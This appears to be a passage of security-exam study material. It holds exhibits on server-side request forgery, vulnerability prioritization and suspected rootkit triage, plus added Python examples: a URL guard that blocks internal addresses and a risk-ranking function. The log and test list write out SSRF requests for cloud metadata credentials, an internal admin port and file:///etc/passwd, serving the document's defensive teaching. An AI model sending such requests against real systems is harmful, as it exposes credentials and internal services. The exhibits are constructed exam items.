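Detection is the confirmation step; the durable fix the switch log exhibit points at is enabling DHCP snooping and dynamic ARP inspection so the switch drops replies that do not match a learned binding.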
Web Access Log
2026-04-17T10:22:11Z "GET /thumb?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 512
2026-04-17T10:22:14Z "GET /thumb?url=http://10.0.5.14:8080/admin HTTP/1.1" 200 133
Application server outbound connections observed to internal RFC1918 addresses after each request.
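Both thumbnail exhibits (the `imageUrl` request that returned cloud role credentials, and the two `url` requests above reaching the metadata service and an internal admin port) are server-side request forgery: the application fetches whatever URL it is handed. The following added example, not from the question bank, is an outbound-URL guard for such an endpoint that allows only http/https, rejects non-global IP literals (loopback, link-local including 169.254.169.254, RFC1918) and then requires the host to be on an allowlist. The allowed hosts are an assumption; a real deployment must also resolve the name, check the resolved address the same way, connect to that pinned address (DNS rebinding), and disable redirects in the HTTP client.

```python
# Added example (not from the question bank): destination validation for a
# server-side image fetch, replayed over the exhibit's two requests.
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Assumed: the thumbnailer may only fetch from these image hosts.
ALLOWED_HOSTS = {"images.example.org", "cdn.example.org"}


def is_internal_address(host: str) -> bool:
    """True for IP literals that must never be fetched server-side: anything
    not globally routable (loopback, link-local metadata range, RFC1918)."""
    try:
        addr = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False   # not an IP literal; the hostname allowlist decides
    return not addr.is_global


def validate_fetch_url(url: str) -> str:
    """Return the URL if it may be fetched, else raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    host = (parts.hostname or "").lower()
    if not host:
        raise ValueError("missing host")
    if is_internal_address(host):
        raise ValueError(f"internal address blocked: {host}")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not in allowlist: {host}")
    if parts.port not in (None, 80, 443):
        raise ValueError(f"port not allowed: {parts.port}")
    return url


def check_many(urls):
    """Map each URL to 'allowed' or its rejection reason (for log replay)."""
    out = {}
    for u in urls:
        try:
            validate_fetch_url(u)
            out[u] = "allowed"
        except ValueError as err:
            out[u] = f"blocked: {err}"
    return out


if __name__ == "__main__":
    # Constructed replay: the two exhibit requests, one legitimate fetch,
    # and a scheme that must never be reachable from a URL parameter.
    for u, verdict in check_many([
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://10.0.5.14:8080/admin",
        "https://images.example.org/cat.png",
        "file:///etc/passwd",
    ]).items():
        print(verdict, "<-", u)
```

On AWS the exhibit's specific target is also closed from the other side by requiring IMDSv2 (a session token obtained with a PUT, which a plain GET through a proxying endpoint cannot supply), but the application-side guard is what stops the same endpoint from reaching the `10.0.5.14:8080` admin page.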
Weekly vulnerability scan summary:
1. WEB01 - Public web server - Critical CVE with known exploit and no compensating control
2. FILE02 - Internal file server - Medium severity missing patch
3. LAP09 - User laptop - Low severity browser plug-in issue
4. PRN01 - Network printer - Informational firmware notice only
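Three exhibits on this page ask the same prioritization question: the four-item scan summary (VPN appliance, HR file server, lab workstation, DMZ reporting server), the CVE review summary (Findings A to D) and the weekly scan summary above. The answer in each case is driven by exposure, exploit availability and compensating controls, with the CVSS base score only as a tiebreaker. The following added example, not from the question bank, encodes that reasoning as a small scoring function and ranks the four-item scan summary with it. The weights and the `Finding` fields are assumptions chosen to illustrate the method, not a standard.

```python
# Added example (not from the question bank): risk ranking that weighs
# exposure, exploitability and compensating controls ahead of raw CVSS.
from dataclasses import dataclass


@dataclass
class Finding:
    name: str
    cvss: float
    exposure: str           # "internet", "internal", "isolated"
    exploit: str            # "in_the_wild", "public", "poc", "none"
    compensating: bool      # an effective mitigating control is in place
    reachable: bool = True  # False when there is no network path at all


# Assumed weights: exposure and exploit maturity dominate the score.
EXPOSURE_WEIGHT = {"internet": 3.0, "internal": 1.5, "isolated": 0.2}
EXPLOIT_WEIGHT = {"in_the_wild": 3.0, "public": 2.5, "poc": 2.0, "none": 1.0}


def risk_score(f: Finding) -> float:
    """Higher means fix sooner. CVSS is folded in as a 0.5..1.0 multiplier
    so it separates findings whose real-world factors are otherwise close."""
    if not f.reachable:
        return 0.0
    score = EXPOSURE_WEIGHT[f.exposure] * EXPLOIT_WEIGHT[f.exploit]
    if f.compensating:
        score *= 0.5
    return round(score * (0.5 + f.cvss / 20.0), 3)


def prioritize(findings):
    """Return the findings ordered from most to least urgent."""
    return sorted(findings, key=risk_score, reverse=True)


# Constructed from the four items in the vulnerability scan summary exhibit.
SCAN = [
    Finding("Internet-facing VPN appliance", 8.8, "internet", "poc", compensating=False),
    Finding("Internal HR file server", 9.8, "internal", "none", compensating=True),
    Finding("Lab workstation", 10.0, "isolated", "public", compensating=False),
    Finding("DMZ reporting server", 7.5, "internet", "public", compensating=True),
]

if __name__ == "__main__":
    for f in prioritize(SCAN):
        print(f"{risk_score(f):6.2f}  {f.name}  (CVSS {f.cvss})")
```

Run on the scan summary, the internet-facing VPN appliance with a public proof of concept and no compensating control comes out first, well ahead of the CVSS 10.0 lab workstation that nothing in production can reach. The same function ranks Finding A (internet-facing, exploit in the wild, patch available) first in the CVE review summary, and WEB01 first in the weekly summary above.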
Administrator checks a suspected host:
tasklist /svc | findstr vpn
(no output)
netstat -ano | findstr 51433
TCP 0.0.0.0:51433 0.0.0.0:0 LISTENING 4
driverquery /v | findstr /i kbdflt2
kbdflt2.sys Unknown C:\Windows\System32\drivers\kbdflt2.sys
EDR note: Process enumeration from user mode does not match kernel event telemetry.